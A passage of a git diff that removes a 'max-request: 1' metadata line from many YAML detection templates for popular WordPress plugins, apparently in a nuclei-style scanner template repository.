https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index 425adf0bfe..e555bf93d3 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: - max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 23a88ea130..88d38e21ed 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 575c9ebe67..840c086fb9 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index 2409c6b370..a8eca7b056 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: - max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git 